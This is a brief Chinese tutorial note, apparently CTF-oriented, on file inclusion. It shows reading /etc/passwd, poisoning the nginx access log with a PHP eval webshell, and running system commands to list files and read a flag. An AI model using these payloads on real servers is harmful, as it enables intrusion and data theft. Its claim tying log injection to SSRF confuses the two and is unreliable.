和文件上传漏洞相关联的就是文件包含漏洞了,这是对于漏洞的进一步利用。这边是一些相对比较基础和常见的上传路径整理和方法,后面会继续更新。
对于文件包含漏洞,找到上传位置是一个比较重要的操作。
首先判断是否可以进行日志注入,判断的条件是是否可以进行ssrf漏洞。
传参/etc/passwd,如果成功,则代表可以进行日志注入
?file=/etc/passwd
这里还要知道的是我们访问的网页文件一般默认存放在**/var/www/html**
默认nginx日志文件在/var/log/nginx/access.log
可以直接命令执行即可也可以用webshell后门工具连接
<?php eval($_GET[2]);?>
可以直接命令执行即可也可以用webshell后门工具连接
?file=/var/log/nginx/access.log&2=system('ls /var/www/html');phpinfo();
?file=/var/log/nginx/access.log&2=system('tac /var/www/html/fl0g.php');phpinfo();